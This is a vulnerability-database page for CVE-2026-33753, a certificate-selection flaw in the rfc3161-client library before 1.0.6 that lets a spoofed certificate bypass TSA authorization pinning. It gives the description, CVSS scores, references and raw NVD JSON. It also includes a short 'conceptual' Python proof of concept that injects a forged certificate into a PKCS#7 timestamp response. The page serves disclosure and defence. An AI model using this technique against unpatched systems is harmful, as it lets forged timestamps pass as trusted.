CVE-2026-33753

Description

rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:trailofbits:rfc3161-client:*:*:*:*:*:*:*:* - VULNERABLE

rfc3161-client < 1.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-33753
# This script demonstrates the logic flaw where a spoofed certificate
# is added to a PKCS#7 bag to bypass authorization checks.

from cryptography.hazmat.primitives import serialization
from cryptography import x509
import asn1crypto

# 1. Load a valid TSA response (PKCS#7 SignedData)
# This contains a valid signature from a trusted TSA
with open('valid_tsa_response.der', 'rb') as f:
    p7_data = f.read()

# 2. Load attacker's spoofed certificate
# This cert has the required CN and EKU to pass policy checks
with open('spoofed_cert.pem', 'rb') as f:
    spoofed_cert = x509.load_pem_x509_certificate(f.read())

# 3. Parse the PKCS#7 structure
signed_data = asn1crypto.pkcs7.SignedData.load(p7_data)

# 4. Inject the spoofed certificate into the certificates bag
# The library fails to pick the correct leaf cert for verification
if 'certificates' not in signed_data:
    signed_data['certificates'] = asn1crypto.core.SetOf([])
    
# Convert spoofed cert to DER and add to the bag
spoofed_cert_der = spoofed_cert.public_bytes(serialization.Encoding.DER)
signed_data['certificates'].append(asn1crypto.x509.Certificate.load(spoofed_cert_der))

# 5. Re-encode the malicious PKCS#7 data
malicious_p7 = signed_data.dump()

# When rfc3161-client parses 'malicious_p7':
# - It extracts the spoofed cert and checks permissions (Pass)
# - It verifies the hash against the real TSA cert (Pass)
# - Result: Authorization Bypass
print("[+] Malicious PKCS#7 payload generated.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33753
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33753
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33753/
[4] VulDB https://vuldb.com/cve/CVE-2026-33753
[5] https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj
[6] https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33753", "sourceIdentifier": "[email protected]", "published": "2026-04-08T16:16:23.670", "lastModified": "2026-04-21T18:12:20.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "rfc3161-client is a Python library implementing the Time-Stamp Protocol (TSP) described in RFC 3161. Prior to 1.0.6, an Authorization Bypass vulnerability in rfc3161-client's signature verification allows any attacker to impersonate a trusted TimeStamping Authority (TSA). By exploiting a logic flaw in how the library extracts the leaf certificate from an unordered PKCS#7 bag of certificates, an attacker can append a spoofed certificate matching the target common_name and Extended Key Usage (EKU) requirements. This tricks the library into verifying these authorization rules against the forged certificate while validating the cryptographic signature against an actual trusted TSA (such as FreeTSA), thereby bypassing the intended TSA authorization pinning entirely. This vulnerability is fixed in 1.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trailofbits:rfc3161-client:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.6", "matchCriteriaId": "16E3C452-B9EE-490C-A46E-F8F8B8BB936A"}]}]}], "references": [{"url": "https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/trailofbits/rfc3161-client/security/advisories/GHSA-3xxc-pwj6-jgrj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}